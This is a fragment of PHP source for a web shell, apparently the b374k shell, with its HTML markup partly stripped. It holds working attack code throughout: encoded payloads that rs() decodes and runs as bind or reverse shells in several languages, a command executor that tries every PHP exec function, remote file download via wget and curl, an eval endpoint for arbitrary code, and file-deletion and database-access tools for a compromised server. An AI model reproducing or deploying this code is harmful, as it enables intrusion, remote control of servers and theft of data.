frWN6022DXsvl0WfrheCu8LIbO4Lj2oFivk7UuLyv8LrYKN+61Kl8OLWatEun9ne/GLRVU3u+P6LDCVQKQb9P2kVeideo0ezQ1kt3HkLOzSPwLsm4crl+usqdTz9DleT3Z2bjcMUgSn90OcdyFuSGhAZBUzo4QToIUBrkhhXXnPeDYOslO5aVswjaulqMBXtjV8Px/sLJgXXnZ/3ReLT1oh1tuoLUEPtPKX00VeHLGV2a1uWMhmWlSCFLXNafQZbMGTq9JcHhsB4O9TCkDqEascfeshdSrTL4S1ReWpWWU7SBwSiwBs0Jtgwry+9jJaxMXP5VrHyvSij1v4OXfIeXRqbgYS5feqQXsQWNaL0gYrfenEEKNpG015uT4SQAJ5vPPPjTg0CMSQwrB2bMjNpJFiEcpE39Pr7uFxEJIO2904/BHHKc+Y+C9vuA+WON2T+I2R+VkyUmPIaQFtEqod5N3BrfNPdzuje//mIj3YeMh9JWa+aQdKIH1g5+l8E/YzWIIcoUyk35fRxxleX+upD5TxHIEoIE3bFCquoba+PjxSDR2E8iW67wCRsYoMosoCJ8/E1BztL6kgk+vvVGQ/zi9wCpOlR3WYpIjXRE6jQzZSNaquus8MU2TzTkxPhJmLkmkc4eYMtvrNKnJz0WtrrEFjq/a3VPT0Yt8SWSBjXfKtetNyZssK8wVKhs9a88W3GgBNSznNivOho+mEJohng786Q+a9mJ044gem7BxBQmTBuMZozd4nvKbuvQta229RV4tJU9Tumwym7r+bycFzyFRPV6HeAX88X2J10igO63XCyAjVafNV3BE/VdlxDe5KR0Biox3uov6q6A24fb8fArM5zMO4sA3GQqw73+OTiSwEkjxalSQlPwlEigqNs9oJf+pvI4jY4qau0R8oJilcRQWjY/rUsvIpsKGnp6P9v6GiXmdYDrb6+TYL8Gt1Io9AgOOygUEg02lwwQwcqmKY9wYWnFQYFNNe0G3n0Wh50qkm6dQu+xkS1fCWb2PXbS9TKQeTOTrp5KwfTuyVbUBHgVOrwT/wU="; // make link for folder $cwd and all of its parent folder function swd($p){ global $s_self; $ps = explode(DIRECTORY_SEPARATOR,$p); $pu = ""; for($i = 0 ; $i < sizeof($ps)-1 ; $i++){ $pz = ""; for($j = 0 ; $j <= $i ; $j++) $pz .= $ps[$j].DIRECTORY_SEPARATOR; $pu .= "".$ps[$i]." ".DIRECTORY_SEPARATOR." "; } return trim($pu); } // htmlspecialchars, < > " function hss($t){ $n = array(">","<","\""); $y = array(">", "<", """); return str_replace($n,$y,$t); } // remove
tags function rp($t){ return trim(str_replace("
","",$t)); } // replace spaces with underscore ( _ ) function cs($t){ return str_replace(" ","_",$t); } // strip slashes,trim and urldecode function ss($t){ return (!get_magic_quotes_gpc())? trim(urldecode($t)) : trim(urldecode(stripslashes($t))); } // only strip slashes function ssc($t){ return (!get_magic_quotes_gpc())? trim($t) : trim(stripslashes($t)); } // bind and reverse shell function rs($rstype,$rstarget,$rscode){ //bind_pl bind_py bind_rb bind_c bind_win bind_php back_pl back_py back_rb back_c back_win back_php //resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php $result = ""; $fpath = ""; $fc = gzinflate(base64_decode($rscode)); $errperm = "Directory ".getcwd().DIRECTORY_SEPARATOR." is not writable, please change to a writable one"; $errgcc = "Unable to compile using gcc"; $split = explode("_",$rstype); $method = $split[0]; $lang = $split[1]; if($lang=="py" || $lang=="pl" || $lang=="rb"){ if($lang=="py") $runlang = "python"; elseif($lang=="pl") $runlang = "perl"; elseif($lang=="rb") $runlang = "ruby"; $fpath = "b374k_rs.".$lang; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $result = exe("chmod +x ".$fpath); $result = exe($runlang." ".$fpath." ".$rstarget); } else $result = $errperm; } else $result = $errperm; } elseif($lang=="c"){ $fpath = "b374k_rs"; if(is_file($fpath)) unlink($fpath); if(is_file($fpath.".c")) unlink($fpath.".c"); if($file=fopen($fpath.".c","w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath.".c")){ $result = exe("gcc ".$fpath.".c -o ".$fpath); if(is_file($fpath)){ $result = exe("chmod +x ".$fpath); $result = exe("./".$fpath." ".$rstarget); } else $result = $errgcc; } else $result = $errperm; } else $result = $errperm; } elseif($lang=="win"){ $fpath = "b374k_rs.exe"; if(is_file($fpath)) unlink($fpath); if($file=fopen($fpath,"w")){ fwrite($file,$fc); fclose($file); if(is_file($fpath)){ $result = exe($fpath." ".$rstarget); } else $result = $errperm; } else $result = $errperm; } elseif($lang=="php"){ $result = eval("?>".$fc); } if(is_file($fpath)) unlink($fpath); if(is_file($fpath.".c")) unlink($fpath.".c"); return $result; } // format bit function ts($s){ if($s<=0) return 0; $w = array('B','KB','MB','GB','TB','PB','EB','ZB','YB'); $e = floor(log($s)/log(1024)); return sprintf('%.2f '.$w[$e], ($s/pow(1024, floor($e)))); } // get file size function gs($f){ $s = @filesize($f); if($s !== false){ if($s<=0) return 0; return ts($s); } else return "???"; } // get file permissions function gp($f){ if($m=@fileperms($f)){ $p = 'u'; if(($m & 0xC000) == 0xC000)$p = 's'; elseif(($m & 0xA000) == 0xA000)$p = 'l'; elseif(($m & 0x8000) == 0x8000)$p = '-'; elseif(($m & 0x6000) == 0x6000)$p = 'b'; elseif(($m & 0x4000) == 0x4000)$p = 'd'; elseif(($m & 0x2000) == 0x2000)$p = 'c'; elseif(($m & 0x1000) == 0x1000)$p = 'p'; $p .= ($m & 00400) ? 'r' : '-'; $p .= ($m & 00200) ? 'w' : '-'; $p .= ($m & 00100) ? 'x' : '-'; $p .= ($m & 00040) ? 'r' : '-'; $p .= ($m & 00020) ? 'w' : '-'; $p .= ($m & 00010) ? 'x' : '-'; $p .= ($m & 00004) ? 'r' : '-'; $p .= ($m & 00002) ? 'w' : '-'; $p .= ($m & 00001) ? 'x' : '-'; return $p; } else return "???????????"; } // shell command function exe($c){ $out = ""; $c = $c." 2>&1"; if(is_callable('system')) { ob_start(); @system($c); $out = ob_get_contents(); ob_end_clean(); if(!empty($out)) return $out; } if(is_callable('shell_exec')){ $out = @shell_exec($c); if(!empty($out)) return $out; } if(is_callable('exec')) { @exec($c,$r); if(!empty($r)) foreach($r as $s) $out .= $s; if(!empty($out)) return $out; } if(is_callable('passthru')) { ob_start(); @passthru($c); $out = ob_get_contents(); ob_end_clean(); if(!empty($out)) return $out; } if(is_callable('proc_open')) { $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $proc = @proc_open($c, $descriptorspec, $pipes, getcwd(), array()); if (is_resource($proc)) { while ($si = fgets($pipes[1])) { if(!empty($si)) $out .= $si; } while ($se = fgets($pipes[2])) { if(!empty($se)) $out .= $se; } } @proc_close($proc); if(!empty($out)) return $out; } if(is_callable('popen')){ $f = @popen($c, 'r'); if($f){ while(!feof($f)){ $out .= fread($f, 2096); } pclose($f); } if(!empty($out)) return $out; } return ""; } // add slash to the end of given path function cp($p){ if(is_dir($p)){ $x = DIRECTORY_SEPARATOR; while(substr($p,-1) == $x) $p = rtrim($p,$x); return $p.$x; } return $p; } // delete dir and all of its content (no warning !) xp function rmdirs($d){ $f = glob($d . '*', GLOB_MARK); foreach($f as $z){ if(is_dir($z)) rmdirs($z); else unlink($z); } if(is_dir($d)) rmdir($d); } // get array of all files from given directory function getallfiles($dir){ $f = glob($dir . '*'); for($i = 0; $i < count($f); $i++){ if(is_dir($f[$i])) { $a = glob($f[$i].DIRECTORY_SEPARATOR.'*'); $f = array_merge($f, $a); } } return $f; } // which command function xwhich($pr){ $p = exe("which $pr"); if(trim($p)!="") { return trim($p); } else { return trim($pr); } } // download file from internet function dlfile($u,$p){ $n = basename($u); // try using php functions if($t = @file_get_contents($u)){ if(is_file($p)) unlink($p);; if($f=fopen($p,"w")){ fwrite($f,$t); fclose($f); if(is_file($p)) return true; } } // using wget exe(xwhich('wget')." ".$u." -O ".$p); if(is_file($p)) return true; // try using lwp-download exe(xwhich('lwp-download')." ".$u." ".$p); if(is_file($p)) return true; // try using lynx exe(xwhich('lynx')." -source ".$u." > ".$p); if(is_file($p)) return true; // try using curl exe(xwhich('curl')." ".$u." -o ".$p); if(is_file($p)) return true; return false; } // find writable dir function get_writabledir(){ if(is_writable(".")) $d = ".".DIRECTORY_SEPARATOR; else{ if(!$d = getenv("TMP")) if(!$d = getenv("TEMP")) if(!$d = getenv("TMPDIR")){ if(is_writable("/tmp")) $d = "/tmp/"; else $d = getcwd().DIRECTORY_SEPARATOR; } } return $d; } // zip function function zip($src, $dest){ if(!extension_loaded('zip') || !file_exists($src)) return false; if(class_exists("ZipArchive")){ $zip = new ZipArchive(); if(!$zip->open($dest, 1)) return false; $src = str_replace('\\', '/', $src); if(is_dir($src)){ $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src), 1); foreach($files as $file){ $file = str_replace('\\', '/', $file); if(in_array(substr($file, strrpos($file, '/')+1), array('.', '..'))) continue; if (is_dir($file) === true) $zip->addEmptyDir(str_replace($src . '/', '', $file . '/')); else if (is_file($file) === true) $zip->addFromString(str_replace($src . '/', '', $file), @file_get_contents($file)); } } elseif(is_file($src) === true) $zip->addFromString(basename($src), @file_get_contents($src)); $zip->close(); return true; } } // check shell permission to access program function check_access($lang){ $s = 0; switch($lang){ case "python": $cek = strtolower(exe("python -h")); if(strpos($cek,"usage")!==false) $s = 1; break; case "perl": $cek = strtolower(exe("perl -h")); if(strpos($cek,"usage")!==false) $s = 1; break; case "ruby": $cek = strtolower(exe("ruby -h")); if(strpos($cek,"usage")!==false) $s = 1; break; case "gcc": $cek = strtolower(exe("gcc --help")); if(strpos($cek,"usage")!==false) $s = 1; break; case "tar": $cek = strtolower(exe("tar --help")); if(strpos($cek,"usage")!==false) $s = 1; break; case "java": $cek = strtolower(exe("javac --help")); if(strpos($cek,"usage")!==false){ $cek = strtolower(exe("java -h")); if(strpos($cek,"usage")!==false) $s = 1; } break; } return $s; } // find available archiver function get_archiver_available(){ global $s_self, $s_tar; $dlfile = ""; $avail_arc = array("raw"=>"raw"); if(class_exists("ZipArchive")){ $avail_arc["ziparchive"] = "zip"; } if($s_tar){ $avail_arc["tar"] = "tar"; $avail_arc["targz"] = "tar.gz"; } $option_arc = ""; foreach($avail_arc as $t=>$u){ $option_arc .= ""; } $dlfile .= "
"; return $dlfile; } // explorer, return a table of given dir function showdir($cwd){ global $s_self; $posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false; $win = (strtolower(substr(php_uname(),0,3)) == "win")? true : false; $fname = array(); $dname = array(); if(function_exists("scandir") && $dh = @scandir($cwd)){ foreach($dh as $file){ if(is_dir($file)) $dname[] = $file; elseif(is_file($file)) $fname[] = $file; } } else{ if($dh = @opendir($cwd)){ while($file = readdir($dh)){ if(is_dir($file)) $dname[] = $file; elseif(is_file($file))$fname[] = $file; } closedir($dh); } } sort($fname); sort($dname); $list = array_merge($dname,$fname); if($win){ //check if this root directory chdir(".."); if(cp(getcwd())==cp($cwd)){ array_unshift($list, "."); } chdir($cwd); } $path = explode(DIRECTORY_SEPARATOR,$cwd); $tree = sizeof($path); $parent = ""; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $cwd; $owner_html = (!$win && $posix) ? "owner:group" : ""; $buff = " ".$owner_html." "; $arc = get_archiver_available(); foreach($list as $l){ if(!$win && $posix){ $name = posix_getpwuid(fileowner($l)); $group = posix_getgrgid(filegroup($l)); $owner = $name['name'].":".$group['name']; $owner_html = ""; } $lhref = ""; $lname = ""; $laction = ""; if(is_dir($l)){ if($l=="."){ $lhref = $s_self."cd=".$cwd; $lsize = "LINK"; $laction = " find | upl | +file | +dir
"; } elseif($l==".."){ $lhref = $s_self."cd=".$parent; $lsize = "LINK"; $laction = " find | upl | +file | +dir
"; } else{ $lhref = $s_self."cd=".$cwd.$l.DIRECTORY_SEPARATOR; $lsize = "DIR"; $laction = " find | upl | ren | del
"; } $lname = "[ ".$l." ]"; $lsizetit = "0"; } else{ $lhref = $s_self."view=".$l; $lname = $l; $lsize = gs($l); $lsizetit = @filesize($l); $laction = "
edit | hex | ren | del "; } $ldl = str_replace("__dlpath__",$l,$arc); $buff .= " ".$owner_html." "; } $buff .= "
namesizepermsmodifiedactiondownload
".$owner."
".$lname." ".$lsize."".gp($l)." ".@date("d-M-Y H:i",filemtime($l))." ".$laction." ".$ldl."
"; return $buff; } //database related functions function sql_connect($sqltype, $sqlhost, $sqluser, $sqlpass){ if($sqltype == 'mysql'){if(function_exists('mysql_connect')) return @mysql_connect($sqlhost,$sqluser,$sqlpass);} elseif($sqltype == 'mssql'){ if(function_exists('mssql_connect')) return @mssql_connect($sqlhost,$sqluser,$sqlpass); elseif(function_exists('sqlsrv_connect')){ $coninfo = array("UID"=>$sqluser, "PWD"=>$sqlpass); return @sqlsrv_connect($sqlhost,$coninfo); } } elseif($sqltype == 'pgsql'){ $hosts = explode(":", $sqlhost); if(count($hosts)==2){ $host_str = "host=".$hosts[0]." port=".$hosts[1]; } else $host_str = "host=".$sqlhost; if(function_exists('pg_connect')) return @pg_connect("$host_str user=$sqluser password=$sqlpass"); } elseif($sqltype == 'oracle'){if(function_exists('oci_connect')) return @oci_connect($sqluser,$sqlpass,$sqlhost);} elseif($sqltype == 'sqlite3'){ if(class_exists('SQLite3')) if(!empty($sqlhost)) return new SQLite3($sqlhost); else return false; } elseif($sqltype == 'sqlite'){if(function_exists('sqlite_open')) return @sqlite_open($sqlhost);} elseif($sqltype == 'odbc'){if(function_exists('odbc_connect')) return @odbc_connect($sqlhost,$sqluser,$sqlpass);} elseif($sqltype == 'pdo'){ if(class_exists('PDO')) if(!empty($sqlhost)) return new PDO($sqlhost,$sqluser,$sqlpass); else return false; } } function sql_query($sqltype, $query, $con){ if($sqltype == 'mysql'){if(function_exists('mysql_query')) return mysql_query($query);} elseif($sqltype == 'mssql'){ if(function_exists('mssql_query')) return mssql_query($query); elseif(function_exists('sqlsrv_query')) return sqlsrv_query($con,$query); } elseif($sqltype == 'pgsql'){if(function_exists('pg_query')) return pg_query($query);} elseif($sqltype == 'oracle'){ if(function_exists('oci_parse') && function_exists('oci_execute')){ $st = oci_parse($con, $query); oci_execute($st); return $st; } } elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $con->query($query);} elseif($sqltype == 'sqlite'){if(function_exists('sqlite_query')) return sqlite_query($con, $query);} elseif($sqltype == 'odbc'){if(function_exists('odbc_exec')) return odbc_exec($con, $query);} elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $con->query($query);} } function sql_num_fields($sqltype, $hasil){ if($sqltype == 'mysql'){if(function_exists('mysql_num_fields')) return mysql_num_fields($hasil);} elseif($sqltype == 'mssql'){ if(function_exists('mssql_num_fields')) return mssql_num_fields($hasil); elseif(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($hasil); } elseif($sqltype == 'pgsql'){if(function_exists('pg_num_fields')) return pg_num_fields($hasil);} elseif($sqltype == 'oracle'){if(function_exists('oci_num_fields')) return oci_num_fields($hasil);} elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $hasil->numColumns();} elseif($sqltype == 'sqlite'){if(function_exists('sqlite_num_fields')) return sqlite_num_fields($hasil);} elseif($sqltype == 'odbc'){if(function_exists('odbc_num_fields')) return odbc_num_fields($hasil);} elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $hasil->columnCount();} } function sql_field_name($sqltype,$hasil,$i){ if($sqltype == 'mysql'){if(function_exists('mysql_field_name')) return mysql_field_name($hasil,$i);} elseif($sqltype == 'mssql'){ if(function_exists('mssql_field_name')) return mssql_field_name($hasil,$i); elseif(function_exists('sqlsrv_field_metadata')){ $metadata = sqlsrv_field_metadata($hasil); if(is_array($metadata)){ $metadata=$metadata[$i]; } if(is_array($metadata)) return $metadata['Name']; } } elseif($sqltype == 'pgsql'){if(function_exists('pg_field_name')) return pg_field_name($hasil,$i);} elseif($sqltype == 'oracle'){if(function_exists('oci_field_name')) return oci_field_name($hasil,$i+1);} elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $hasil->columnName($i);} elseif($sqltype == 'sqlite'){if(function_exists('sqlite_field_name')) return sqlite_field_name($hasil,$i);} elseif($sqltype == 'odbc'){if(function_exists('odbc_field_name')) return odbc_field_name($hasil,$i+1);} elseif($sqltype == 'pdo'){ if(class_exists('PDO')){ $res = $hasil->getColumnMeta($i); return $res['name']; } } } function sql_fetch_data($sqltype,$hasil){ if($sqltype == 'mysql'){if(function_exists('mysql_fetch_row')) return mysql_fetch_row($hasil);} elseif($sqltype == 'mssql'){ if(function_exists('mssql_fetch_row')) return mssql_fetch_row($hasil); elseif(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($hasil,1); } elseif($sqltype == 'pgsql'){if(function_exists('pg_fetch_row')) return pg_fetch_row($hasil);} elseif($sqltype == 'oracle'){if(function_exists('oci_fetch_row')) return oci_fetch_row($hasil);} elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $hasil->fetchArray(1);} elseif($sqltype == 'sqlite'){if(function_exists('sqlite_fetch_array')) return sqlite_fetch_array($hasil,1);} elseif($sqltype == 'odbc'){if(function_exists('odbc_fetch_array')) return odbc_fetch_array($hasil);} elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $hasil->fetch(2);} } function sql_num_rows($sqltype,$hasil){ if($sqltype == 'mysql'){if(function_exists('mysql_num_rows')) return mysql_num_rows($hasil);} elseif($sqltype == 'mssql'){ if(function_exists('mssql_num_rows')) return mssql_num_rows($hasil); elseif(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($hasil); } elseif($sqltype == 'pgsql'){if(function_exists('pg_num_rows')) return pg_num_rows($hasil);} elseif($sqltype == 'oracle'){if(function_exists('oci_num_rows')) return oci_num_rows($hasil);} elseif($sqltype == 'sqlite3'){ if(class_exists('SQLite3')){ $metadata = $hasil->fetchArray(); if(is_array($metadata)) return $metadata['count']; } } elseif($sqltype == 'sqlite'){if(function_exists('sqlite_num_rows')) return sqlite_num_rows($hasil);} elseif($sqltype == 'odbc'){if(function_exists('odbc_num_rows')) return odbc_num_rows($hasil);} elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $hasil->rowCount();} } function sql_close($sqltype,$con){ if($sqltype == 'mysql'){if(function_exists('mysql_close')) return mysql_close($con);} elseif($sqltype == 'mssql'){ if(function_exists('mssql_close')) return mssql_close($con); elseif(function_exists('sqlsrv_close')) return sqlsrv_close($con); } elseif($sqltype == 'pgsql'){if(function_exists('pg_close')) return pg_close($con);} elseif($sqltype == 'oracle'){if(function_exists('oci_close')) return oci_close($con);} elseif($sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $con->close();} elseif($sqltype == 'sqlite'){if(function_exists('sqlite_close')) return sqlite_close($con);} elseif($sqltype == 'odbc'){if(function_exists('odbc_close')) return odbc_close($con);} elseif($sqltype == 'pdo'){if(class_exists('PDO')) return $con = null;} } if(!function_exists('str_split')){ function str_split($t,$s=1){ $a = array(); for($i=0;$i[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "".$letter."";} $letters .= " ] "; } } } // prompt style.. $s_prompt = $s_user." >"; // check for posix $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false; // server ip $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]); // your ip ;-) $s_my_ip = $_SERVER['REMOTE_ADDR']; $s_result = ""; global $s_python, $s_perl, $s_ruby, $s_gcc, $s_java, $s_tar; // check python if(isset($_COOKIE['s_python'])){$s_python = $_COOKIE['s_python'];} else{ $s_python = check_access("python"); setcookie("s_python", $s_python ,time() + $s_login_time); } $s_python = ($s_python=="1")?true:false; // check perl if(isset($_COOKIE['s_perl'])){$s_perl = $_COOKIE['s_perl'];} else{ $s_perl = check_access("perl"); setcookie("s_perl", $s_perl ,time() + $s_login_time); } $s_perl = ($s_perl=="1")?true:false; // check ruby if(isset($_COOKIE['s_ruby'])){$s_ruby = $_COOKIE['s_ruby'];} else{ $s_ruby = check_access("ruby"); setcookie("s_ruby", $s_ruby ,time() + $s_login_time); } $s_ruby = ($s_ruby=="1")?true:false; // check gcc if(isset($_COOKIE['s_gcc'])){$s_gcc = $_COOKIE['s_gcc'];} else{ $s_gcc = check_access("gcc"); setcookie("s_gcc", $s_gcc ,time() + $s_login_time); } $s_gcc = ($s_gcc=="1")?true:false; // check java if(isset($_COOKIE['s_java'])){$s_java = $_COOKIE['s_java'];} else{ $s_java = check_access("java"); setcookie("s_java", $s_java ,time() + $s_login_time); } $s_java = ($s_java=="1")?true:false; // check tar if(isset($_COOKIE['s_tar'])){$s_tar = $_COOKIE['s_tar'];} else{ $s_tar = check_access("tar"); setcookie("s_tar", $s_tar ,time() + $s_login_time); } $s_tar = ($s_tar=="1")?true:false; // sorttable.js if(isset($_REQUEST['sorttable'])){ $data = gzinflate(base64_decode($sortable_js)); header("Content-type: text/javascript"); header("Cache-control: public"); echo $data; exit; } if(!empty($_REQUEST['dltype']) && !empty($_REQUEST['dlpath'])){ $dltype = ss($_REQUEST['dltype']); $dlpath = ss($_REQUEST['dlpath']); $dlname = basename($dlpath); if($dlpath==".") $dlname=basename($cwd); elseif($dlpath==".."){ chdir(".."); $dlname=basename(getcwd()); chdir($cwd); } $tmpdir = get_writabledir(); $dlarchive = $tmpdir.$dlname; $dlthis = ""; if($dltype=="ziparchive"){ $dlarchive .= ".zip"; if(zip($dlpath,$dlarchive)){ $dlthis = $dlarchive; } } elseif($dltype=="tar"){ $dlarchive .= ".tar"; $dlarchive = str_replace('\\', '/', $dlarchive); exe("tar cf ".$dlarchive." ".$dlpath); $dlthis = $dlarchive; } elseif($dltype=="targz"){ $dlarchive .= ".tar.gz"; $dlarchive = str_replace('\\', '/', $dlarchive); exe("tar czf ".$dlarchive." ".$dlpath); $dlthis = $dlarchive; } elseif($dltype=="raw"){ if(is_file($dlpath)) $dlthis = $dlpath; } if(is_file($dlthis)){ header("Content-Type: application/octet-stream"); header('Content-Transfer-Encoding: binary'); header("Content-length: ".@filesize($dlthis)); header("Content-disposition: attachment; filename=\"".basename($dlthis)."\";"); $file = @fopen($dlthis,"rb"); while(!feof($file)){ print(@fread($file, 1024*8)); ob_flush(); flush(); } fclose($file); if($dltype!="raw"){ rename($dlthis,$dlthis."del"); unlink($dlthis."del"); } exit; } } // view image specified by ?img= if(isset($_REQUEST['img'])){ ob_clean(); $d = ss($_REQUEST['d']); $f = ss($_REQUEST['img']); $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; header("Content-type: ".$inf["mime"]); header("Cache-control: public"); header("Expires: ".@date("r",@mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7));# readfile($d.$f); exit; } // rename file or folder if(isset($_REQUEST['rename']) && isset($_REQUEST['oldname']) && isset($_REQUEST['newname'])){ $old = ss($_REQUEST['oldname']); $new = ss($_REQUEST['newname']); $renmsg = ""; if(is_dir($old)) $renmsg = (@rename($cwd.$old,$cwd.$new)) ? "Directory ".$old." renamed to ".$new : "Unable to rename directory ".$old." to ".$new; elseif(is_file($old)) $renmsg = (@rename($cwd.$old,$cwd.$new)) ? "File ".$old." renamed to ".$new : "Unable to rename file ".$old." to ".$new; else $renmsg = "Cannot find the path specified ".$old; $s_result .= "

".$renmsg."

"; $fnew = $cwd.$new; } // confirm delete if(!empty($_REQUEST['del'])){ $del = trim($_REQUEST['del']); $s_result .= "

Delete ".basename($del)." ? Yes | No

"; }// delete file elseif(!empty($_REQUEST['delete'])){ $f = ss($_REQUEST['delete']); $delmsg = ""; if(is_file($f)){ $delmsg = (unlink($f)) ? "File removed : ".$f : "Unable to remove file ".$f; } elseif(is_dir($f)){ rmdirs($f); $delmsg = (is_dir($f)) ? "Unable to remove directory ".$f : "Directory removed : ".$f; } else $delmsg = "Cannot find the path specified ".$f; $s_result .= "

".$delmsg."

"; } // create dir elseif(!empty($_REQUEST['mkdir'])){ $f = ss($cwd.ss($_REQUEST['mkdir'])); $dirmsg = ""; if(!is_dir($f)){ mkdir($f); if(is_dir($f)) $dirmsg = "Directory created ".$f; else $dirmsg = "Unable to create directory ".$f; } else $dirmsg = "Directory already exists ".$f; $s_result .= "

".$dirmsg."

"; } // php eval() function if(isset($_REQUEST['eval'])){ $code = ""; $res = ""; $gccoption = ""; $lang = "php"; if(isset($_REQUEST['evalcode'])){ $code = ssc($_REQUEST['evalcode']); $gccoption = (isset($_REQUEST['gccoption']))? " ".ssc($_REQUEST['gccoption']):""; $tmpdir = get_writabledir(); if(isset($_REQUEST['lang'])){$lang = $_REQUEST['lang'];} if(strtolower($lang)=='php'){ ob_start(); eval($code); $res = ob_get_contents(); ob_end_clean(); } elseif(strtolower($lang)=='python'||strtolower($lang)=='perl'||strtolower($lang)=='ruby'){ $rand = md5(time().rand(0,100)); $script = $tmpdir.$rand; file_put_contents($script, $code); if(is_file($script)){ $res = exe($lang." ".$script.$gccoption); unlink($script); } } elseif(strtolower($lang)=='gcc'){ $script = md5(time().rand(0,100)); chdir($tmpdir); file_put_contents($script.".c", $code); if(is_file($script.".c")){ $scriptout = $s_win ? $script.".exe" : $script; $res = exe("gcc ".$script.".c -o ".$scriptout.$gccoption); if(is_file($scriptout)){ $res = $s_win ? exe($scriptout) : exe("chmod +x ".$scriptout." ; ./".$scriptout); rename($scriptout, $scriptout."del"); unlink($scriptout."del"); } unlink($script.".c"); } chdir($cwd); } elseif(strtolower($lang)=='java'){ if(preg_match("/class\ ([^{]+){/i",$code, $r)){ $classname = trim($r[1]); $script = $classname; } else{ $rand = "b374k_".substr(md5(time().rand(0,100)),0,8); $script = $rand; $code = "class ".$rand." { ".$code . " } "; } chdir($tmpdir); file_put_contents($script.".java", $code); if(is_file($script.".java")){ $res = exe("javac ".$script.".java"); if(is_file($script.".class")){ $res .= exe("java ".$script.$gccoption); unlink($script.".class"); } unlink($script.".java"); } chdir($pwd); } } $lang_available = ""; $selected = ""; if($s_python){ $checked = ($lang == "python") ? "selected" : ""; $lang_available .= ""; } if($s_perl){ $checked = ($lang == "perl") ? "selected" : ""; $lang_available .= ""; } if($s_ruby){ $checked = ($lang == "ruby") ? "selected" : ""; $lang_available .= ""; } if($s_gcc){ $checked = ($lang == "gcc") ? "selected" : ""; $lang_available .= ""; } if($s_java){ $checked = ($lang == "java") ? "selected" : ""; $lang_available .= ""; } $gccoptionclass = ($lang=="php")? "sembunyi":""; $e_result = (!empty($res)) ? "
".hss($res)."
":""; $s_result .= "

Additional option
".$e_result."
"; } // find elseif(isset($_REQUEST['find'])){ $p = cp($_REQUEST['find']); $type = isset($_REQUEST['type']) ? $_REQUEST['type'] : "sfile"; $sfname = (!empty($_REQUEST['sfname']))?ssc($_REQUEST['sfname']):''; $sdname = (!empty($_REQUEST['sdname']))?ssc($_REQUEST['sdname']):''; $sfcontain = (!empty($_REQUEST['sfcontain']))?ssc($_REQUEST['sfcontain']):''; $sfnameregexchecked=$sfnameicasechecked=$sdnameregexchecked=$sdnameicasechecked=$sfcontainregexchecked=$sfcontainicasechecked=$swritablechecked=$sreadablechecked=$sexecutablechecked=""; $sfnameregex=$sfnameicase=$sdnameregex=$sdnameicase=$sfcontainregex=$sfcontainicase=$swritable=$sreadable=$sexecutable=false; if(isset($_REQUEST['sfnameregex'])){$sfnameregex=true;$sfnameregexchecked="checked";} if(isset($_REQUEST['sfnameicase'])){$sfnameicase=true;$sfnameicasechecked="checked";} if(isset($_REQUEST['sdnameregex'])){$sdnameregex=true;$sdnameregexchecked="checked";} if(isset($_REQUEST['sdnameicase'])){$sdnameicase=true;$sdnameicasechecked="checked";} if(isset($_REQUEST['sfcontainregex'])){$sfcontainregex=true;$sfcontainregexchecked="checked";} if(isset($_REQUEST['sfcontainicase'])){$sfcontainicase=true;$sfcontainicasechecked="checked";} if(isset($_REQUEST['swritable'])){$swritable=true;$swritablechecked="checked";} if(isset($_REQUEST['sreadable'])){$sreadable=true;$sreadablechecked="checked";} if(isset($_REQUEST['sexecutable'])){$sexecutable=true;$sexecutablechecked="checked";} $sexecb = (function_exists("is_executable")) ? "